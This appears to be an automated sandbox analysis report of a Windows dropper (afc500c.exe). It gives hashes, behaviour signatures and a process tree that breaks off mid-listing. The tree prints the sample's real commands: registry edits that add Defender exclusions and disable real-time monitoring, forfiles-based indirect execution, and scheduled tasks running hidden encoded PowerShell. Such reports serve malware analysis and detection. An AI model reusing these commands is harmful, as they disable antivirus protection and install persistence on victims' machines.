Analysis

  • max time kernel
    144s
  • max time network
    146s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
  • submitted
    12/03/2025, 18:50

General

  • Target

    afc500c.exe

  • Size

    7.3MB

  • MD5

    63926a5ec17e0838207346060ea15fec

  • SHA1

    d30179fb24c18f9d49202f5110d38ed7967fa836

  • SHA256

    67c3aedc80696d9f2bf64ec4a4c7c461605d54f169f83babdc8b90993afc500c

  • SHA512

    f0827e23038ad4fc22a0d88c2a8f466638cbb6447538f88bc8eef61b9ca585ecde215cc9c5287fc560cfc7adcb470aa312395dcad9f78e036a4769dd29ea6e48

  • SSDEEP

    196608:91O6DEFZUlN3lPS0XJjoF0Kx0iroV8H6RrzJFAkN:3OAEFZmVqBFV0iroOH6RrHAkN

Malware Config

Signatures

  • Modifies Windows Defender Real-time Protection settings 3 TTPs 4 IoCs
  • Windows security bypass 2 TTPs 40 IoCs
  • Blocklisted process makes network request 1 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs

    Run Powershell and hide display window.

  • Checks BIOS information in registry 2 TTPs 2 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 4 IoCs
  • Indirect Command Execution 1 TTPs 2 IoCs

    Adversaries may abuse utilities that allow for command execution to bypass security restrictions that limit the use of command-line interpreters.

  • Loads dropped DLL 12 IoCs
  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Drops Chrome extension 1 IoCs
  • Drops file in System32 directory 19 IoCs
  • Drops file in Program Files directory 13 IoCs
  • Drops file in Windows directory 4 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 64 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Enumerates system info in registry 2 TTPs 4 IoCs
  • Modifies data under HKEY_USERS 64 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 13 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 29 IoCs
  • Suspicious use of AdjustPrivilegeToken 4 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\afc500c.exe
    "C:\Users\Admin\AppData\Local\Temp\afc500c.exe"
    1⤵
    • Loads dropped DLL
    • System Location Discovery: System Language Discovery
    • Suspicious use of WriteProcessMemory
    PID:2188
    • C:\Users\Admin\AppData\Local\Temp\7zSF41F.tmp\Install.exe
      .\Install.exe
      2⤵
      • Executes dropped EXE
      • Loads dropped DLL
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:2700
      • C:\Users\Admin\AppData\Local\Temp\7zSF631.tmp\Install.exe
        .\Install.exe /S /site_id "525403"
        3⤵
        • Checks BIOS information in registry
        • Executes dropped EXE
        • Loads dropped DLL
        • Drops file in System32 directory
        • Enumerates system info in registry
        • Suspicious use of WriteProcessMemory
        PID:2956
        • C:\Windows\SysWOW64\forfiles.exe
          "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"
          4⤵
          • Indirect Command Execution
          • Suspicious use of WriteProcessMemory
          PID:2720
          • C:\Windows\SysWOW64\cmd.exe
            /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&
            5⤵
            • Suspicious use of WriteProcessMemory
            PID:2584
            • \??\c:\windows\SysWOW64\reg.exe
              REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32
              6⤵
                PID:2628
              • \??\c:\windows\SysWOW64\reg.exe
                REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64
                6⤵
                • System Location Discovery: System Language Discovery
                PID:3024
          • C:\Windows\SysWOW64\forfiles.exe
            "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"
            4⤵
            • Indirect Command Execution
            • Suspicious use of WriteProcessMemory
            PID:2556
            • C:\Windows\SysWOW64\cmd.exe
              /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&
              5⤵
              • System Location Discovery: System Language Discovery
              • Suspicious use of WriteProcessMemory
              PID:2616
              • \??\c:\windows\SysWOW64\reg.exe
                REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32
                6⤵
                  PID:812
                • \??\c:\windows\SysWOW64\reg.exe
                  REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64
                  6⤵
                    PID:2240
              • C:\Windows\SysWOW64\schtasks.exe
                schtasks /CREATE /TN "gBiopKMZs" /SC once /ST 04:19:57 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
                4⤵
                • System Location Discovery: System Language Discovery
                • Scheduled Task/Job: Scheduled Task
                PID:1532
              • C:\Windows\SysWOW64\schtasks.exe
                schtasks /run /I /tn "gBiopKMZs"
                4⤵
                • System Location Discovery: System Language Discovery
                PID:576
              • C:\Windows\SysWOW64\schtasks.exe
                schtasks /DELETE /F /TN "gBiopKMZs"
                4⤵
                • System Location Discovery: System Language Discovery
                PID:2876
              • C:\Windows\SysWOW64\schtasks.exe
                schtasks /CREATE /TN "bIqjSKjLtvGhSJBNfA" /SC once /ST 18:52:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\OBIEeKtMHilfBZfce\dWLAMXehBrRmAUd\GuxHFDR.exe\" ik /site_id 525403 /S" /V1 /F
                4⤵
                • Drops file in Windows directory
                • Scheduled Task/Job: Scheduled Task
                PID:1636
        • C:\Windows\system32\taskeng.exe
          taskeng.exe {AD1303F8-3ECB-46AE-83DD-3C4DFAA35A1F} S-1-5-21-3063565911-2056067323-3330884624-1000:KHBTHJFA\Admin:Interactive:[1]
          1⤵
            PID:2912
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
              C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
              2⤵
              • Command and Scripting Interpreter: PowerShell
              • Drops file in System32 directory
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:3020
              • C:\Windows\system32\gpupdate.exe
                "C:\Windows\system32\gpupdate.exe" /force
                3⤵
                  PID:2148
              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
                2⤵
                • Command and Scripting Interpreter: PowerShell
                • Drops file in System32 directory
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                PID:1608
                • C:\Windows\system32\gpupdate.exe
                  "C:\Windows\system32\gpupdate.exe" /force
                  3⤵
                    PID:1748
                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
                  2⤵
                  • Command and Scripting Interpreter: PowerShell
                  • Drops file in System32 directory
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  PID:1304
                  • C:\Windows\system32\gpupdate.exe
                    "C:\Windows\system32\gpupdate.exe" /force
                    3⤵
                      PID:2840
                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
                    2⤵
                    • Command and Scripting Interpreter: PowerShell
                    • Drops file in System32 directory
                    • Suspicious behavior: EnumeratesProcesses
                    • Suspicious use of AdjustPrivilegeToken
                    PID:2312
                    • C:\Windows\system32\gpupdate.exe
                      "C:\Windows\system32\gpupdate.exe" /force
                      3⤵
                        PID:2556
                  • C:\Windows\system32\gpscript.exe
                    gpscript.exe /RefreshSystemParam
                    1⤵
                      PID:600
                    • C:\Windows\system32\taskeng.exe
                      taskeng.exe {B48BD08E-A97D-4E73-B077-6A5CA34D1D46} S-1-5-18:NT AUTHORITY\System:Service:
                      1⤵
                        PID:2080
                        • C:\Users\Admin\AppData\Local\Temp\OBIEeKtMHilfBZfce\dWLAMXehBrRmAUd\GuxHFDR.exe
                          C:\Users\Admin\AppData\Local\Temp\OBIEeKtMHilfBZfce\dWLAMXehBrRmAUd\GuxHFDR.exe ik /site_id 525403 /S
                          2⤵
                          • Executes dropped EXE
                          • Drops file in System32 directory
                          • System Location Discovery: System Language Discovery
                          PID:1940
                          • C:\Windows\SysWOW64\schtasks.exe
                            schtasks /CREATE /TN "gGswowORp" /SC once /ST 07:03:56 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
                            3⤵
                            • System Location Discovery: System Language Discovery
                            • Scheduled Task/Job: Scheduled Task
                            PID:2420
                          • C:\Windows\SysWOW64\schtasks.exe
                            schtasks /run /I /tn "gGswowORp"
                            3⤵
                              PID:876
                            • C:\Windows\SysWOW64\schtasks.exe
                              schtasks /DELETE /F /TN "gGswowORp"
                              3⤵
                                PID:2484
                              • C:\Windows\SysWOW64\cmd.exe
                                cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:32
                                3⤵
                                  PID:1784
                                  • C:\Windows\SysWOW64\reg.exe
                                    REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:32
                                    4⤵
                                    • Modifies Windows Defender Real-time Protection settings
                                    PID:3008
                                • C:\Windows\SysWOW64\cmd.exe
                                  cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:64
                                  3⤵
                                  • System Location Discovery: System Language Discovery
                                  PID:2104
                                  • C:\Windows\SysWOW64\reg.exe
                                    REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:64
                                    4⤵
                                    • Modifies Windows Defender Real-time Protection settings
                                    PID:2172
                                • C:\Windows\SysWOW64\schtasks.exe
                                  schtasks /CREATE /TN "golVOgxGF" /SC once /ST 00:12:40 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
                                  3⤵
                                  • System Location Discovery: System Language Discovery
                                  • Scheduled Task/Job: Scheduled Task
                                  PID:900
                                • C:\Windows\SysWOW64\schtasks.exe
                                  schtasks /run /I /tn "golVOgxGF"
                                  3⤵
                                    PID:1992
                                  • C:\Windows\SysWOW64\schtasks.exe
                                    schtasks /DELETE /F /TN "golVOgxGF"
                                    3⤵
                                    • System Location Discovery: System Language Discovery
                                    PID:1360
                                  • C:\Windows\SysWOW64\cmd.exe
                                    cmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\dwSOvWKysCpEXQRJ" /t REG_DWORD /d 0 /reg:32
                                    3⤵
                                      PID:1532
                                      • C:\Windows\SysWOW64\reg.exe
                                        REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\dwSOvWKysCpEXQRJ" /t REG_DWORD /d 0 /reg:32
                                        4⤵
                                        • Windows security bypass
                                        PID:576
                                    • C:\Windows\SysWOW64\cmd.exe
                                      cmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\dwSOvWKysCpEXQRJ" /t REG_DWORD /d 0 /reg:64
                                      3⤵
                                        PID:3044
                                        • C:\Windows\SysWOW64\reg.exe
                                          REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\dwSOvWKysCpEXQRJ" /t REG_DWORD /d 0 /reg:64
                                          4⤵
                                          • Windows security bypass
                                          • System Location Discovery: System Language Discovery
                                          PID:2888
                                      • C:\Windows\SysWOW64\cmd.exe
                                        cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\dwSOvWKysCpEXQRJ" /t REG_DWORD /d 0 /reg:32
                                        3⤵
                                        • System Location Discovery: System Language Discovery
                                        PID:1796
                                        • C:\Windows\SysWOW64\reg.exe
                                          REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\dwSOvWKysCpEXQRJ" /t REG_DWORD /d 0 /reg:32
                                          4⤵
                                            PID:3004
                                        • C:\Windows\SysWOW64\cmd.exe
                                          cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\dwSOvWKysCpEXQRJ" /t REG_DWORD /d 0 /reg:64
                                          3⤵
                                          • System Location Discovery: System Language Discovery
                                          PID:2368
                                          • C:\Windows\SysWOW64\reg.exe
                                            REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\dwSOvWKysCpEXQRJ" /t REG_DWORD /d 0 /reg:64
                                            4⤵
                                            • System Location Discovery: System Language Discovery
                                            PID:1580
                                        • C:\Windows\SysWOW64\cmd.exe
                                          cmd /C copy nul "C:\Windows\Temp\dwSOvWKysCpEXQRJ\CFGUGlwq\JNJdrPykbGfDMCMr.wsf"
                                          3⤵
                                            PID:3020
                                          • C:\Windows\SysWOW64\wscript.exe
                                            wscript "C:\Windows\Temp\dwSOvWKysCpEXQRJ\CFGUGlwq\JNJdrPykbGfDMCMr.wsf"
                                            3⤵
                                            • System Location Discovery: System Language Discovery
                                            • Modifies data under HKEY_USERS
                                            PID:1632
                                            • C:\Windows\SysWOW64\reg.exe
                                              "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\CbVqBnigU" /t REG_DWORD /d 0 /reg:32
                                              4⤵
                                              • Windows security bypass
                                              PID:1288
                                            • C:\Windows\SysWOW64\reg.exe
                                              "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\CbVqBnigU" /t REG_DWORD /d 0 /reg:64
                                              4⤵
                                              • Windows security bypass
                                              PID:2760
                                            • C:\Windows\SysWOW64\reg.exe
                                              "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\LfKWeIlHqQBU2" /t REG_DWORD /d 0 /reg:32
                                              4⤵
                                              • Windows security bypass
                                              PID:328
                                            • C:\Windows\SysWOW64\reg.exe
                                              "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\LfKWeIlHqQBU2" /t REG_DWORD /d 0 /reg:64
                                              4⤵
                                              • Windows security bypass
                                              PID:2868
                                            • C:\Windows\SysWOW64\reg.exe
                                              "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ardKySDqUVkhC" /t REG_DWORD /d 0 /reg:32
                                              4⤵
                                              • Windows security bypass
                                              PID:2824
                                            • C:\Windows\SysWOW64\reg.exe
                                              "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ardKySDqUVkhC" /t REG_DWORD /d 0 /reg:64
                                              4⤵
                                              • Windows security bypass
                                              • System Location Discovery: System Language Discovery
                                              PID:2832
                                            • C:\Windows\SysWOW64\reg.exe
                                              "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\dIcdGsFSuyUn" /t REG_DWORD /d 0 /reg:32
                                              4⤵
                                              • Windows security bypass
                                              PID:1636
                                            • C:\Windows\SysWOW64\reg.exe
                                              "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\dIcdGsFSuyUn" /t REG_DWORD /d 0 /reg:64
                                              4⤵
                                              • Windows security bypass
                                              • System Location Discovery: System Language Discovery
                                              PID:2012
                                            • C:\Windows\SysWOW64\reg.exe
                                              "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\xQNizQXsNpkyKPuIghR" /t REG_DWORD /d 0 /reg:32
                                              4⤵
                                              • Windows security bypass
                                              PID:2976
                                            • C:\Windows\SysWOW64\reg.exe
                                              "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\xQNizQXsNpkyKPuIghR" /t REG_DWORD /d 0 /reg:64
                                              4⤵
                                              • Windows security bypass
                                              • System Location Discovery: System Language Discovery
                                              PID:2536
                                            • C:\Windows\SysWOW64\reg.exe
                                              "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\TUiypwAeSPRUPoVB" /t REG_DWORD /d 0 /reg:32
                                              4⤵
                                              • Windows security bypass
                                              PID:2960
                                            • C:\Windows\SysWOW64\reg.exe
                                              "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\TUiypwAeSPRUPoVB" /t REG_DWORD /d 0 /reg:64
                                              4⤵
                                              • Windows security bypass
                                              PID:2928
                                            • C:\Windows\SysWOW64\reg.exe
                                              "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32
                                              4⤵
                                              • Windows security bypass
                                              • System Location Discovery: System Language Discovery
                                              PID:2252
                                            • C:\Windows\SysWOW64\reg.exe
                                              "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64
                                              4⤵
                                              • Windows security bypass
                                              • System Location Discovery: System Language Discovery
                                              PID:816
                                            • C:\Windows\SysWOW64\reg.exe
                                              "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\OBIEeKtMHilfBZfce" /t REG_DWORD /d 0 /reg:32
                                              4⤵
                                              • Windows security bypass
                                              • System Location Discovery: System Language Discovery
                                              PID:1928
                                            • C:\Windows\SysWOW64\reg.exe
                                              "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\OBIEeKtMHilfBZfce" /t REG_DWORD /d 0 /reg:64
                                              4⤵
                                              • Windows security bypass
                                              • System Location Discovery: System Language Discovery
                                              PID:896
                                            • C:\Windows\SysWOW64\reg.exe
                                              "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\dwSOvWKysCpEXQRJ" /t REG_DWORD /d 0 /reg:32
                                              4⤵
                                              • Windows security bypass
                                              • System Location Discovery: System Language Discovery
                                              PID:2388
                                            • C:\Windows\SysWOW64\reg.exe
                                              "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\dwSOvWKysCpEXQRJ" /t REG_DWORD /d 0 /reg:64
                                              4⤵
                                              • Windows security bypass
                                              • System Location Discovery: System Language Discovery
                                              PID:2728
                                            • C:\Windows\SysWOW64\reg.exe
                                              "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\CbVqBnigU" /t REG_DWORD /d 0 /reg:32
                                              4⤵
                                                PID:2192
                                              • C:\Windows\SysWOW64\reg.exe
                                                "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\CbVqBnigU" /t REG_DWORD /d 0 /reg:64
                                                4⤵
                                                  PID:2160
                                                • C:\Windows\SysWOW64\reg.exe
                                                  "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\LfKWeIlHqQBU2" /t REG_DWORD /d 0 /reg:32
                                                  4⤵
                                                  • System Location Discovery: System Language Discovery
                                                  PID:984
                                                • C:\Windows\SysWOW64\reg.exe
                                                  "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\LfKWeIlHqQBU2" /t REG_DWORD /d 0 /reg:64
                                                  4⤵
                                                  • System Location Discovery: System Language Discovery
                                                  PID:696
                                                • C:\Windows\SysWOW64\reg.exe
                                                  "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ardKySDqUVkhC" /t REG_DWORD /d 0 /reg:32
                                                  4⤵
                                                  • System Location Discovery: System Language Discovery
                                                  PID:2152
                                                • C:\Windows\SysWOW64\reg.exe
                                                  "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ardKySDqUVkhC" /t REG_DWORD /d 0 /reg:64
                                                  4⤵
                                                  • System Location Discovery: System Language Discovery
                                                  PID:952
                                                • C:\Windows\SysWOW64\reg.exe
                                                  "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\dIcdGsFSuyUn" /t REG_DWORD /d 0 /reg:32
                                                  4⤵
                                                  • System Location Discovery: System Language Discovery
                                                  PID:2528
                                                • C:\Windows\SysWOW64\reg.exe
                                                  "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\dIcdGsFSuyUn" /t REG_DWORD /d 0 /reg:64
                                                  4⤵
                                                  • System Location Discovery: System Language Discovery
                                                  PID:2460
                                                • C:\Windows\SysWOW64\reg.exe
                                                  "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\xQNizQXsNpkyKPuIghR" /t REG_DWORD /d 0 /reg:32
                                                  4⤵
                                                  • System Location Discovery: System Language Discovery
                                                  PID:1040
                                                • C:\Windows\SysWOW64\reg.exe
                                                  "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\xQNizQXsNpkyKPuIghR" /t REG_DWORD /d 0 /reg:64
                                                  4⤵
                                                  • System Location Discovery: System Language Discovery
                                                  PID:3012
                                                • C:\Windows\SysWOW64\reg.exe
                                                  "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\TUiypwAeSPRUPoVB" /t REG_DWORD /d 0 /reg:32
                                                  4⤵
                                                  • System Location Discovery: System Language Discovery
                                                  PID:1624
                                                • C:\Windows\SysWOW64\reg.exe
                                                  "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\TUiypwAeSPRUPoVB" /t REG_DWORD /d 0 /reg:64
                                                  4⤵
                                                    PID:2412
                                                  • C:\Windows\SysWOW64\reg.exe
                                                    "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32
                                                    4⤵
                                                    • System Location Discovery: System Language Discovery
                                                    PID:1996
                                                  • C:\Windows\SysWOW64\reg.exe
                                                    "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64
                                                    4⤵
                                                    • System Location Discovery: System Language Discovery
                                                    PID:2480
                                                  • C:\Windows\SysWOW64\reg.exe
                                                    "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\OBIEeKtMHilfBZfce" /t REG_DWORD /d 0 /reg:32
                                                    4⤵
                                                      PID:2512
                                                    • C:\Windows\SysWOW64\reg.exe
                                                      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\OBIEeKtMHilfBZfce" /t REG_DWORD /d 0 /reg:64
                                                      4⤵
                                                      • System Location Discovery: System Language Discovery
                                                      PID:3056
                                                    • C:\Windows\SysWOW64\reg.exe
                                                      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\dwSOvWKysCpEXQRJ" /t REG_DWORD /d 0 /reg:32
                                                      4⤵
                                                        PID:1412
                                                      • C:\Windows\SysWOW64\reg.exe
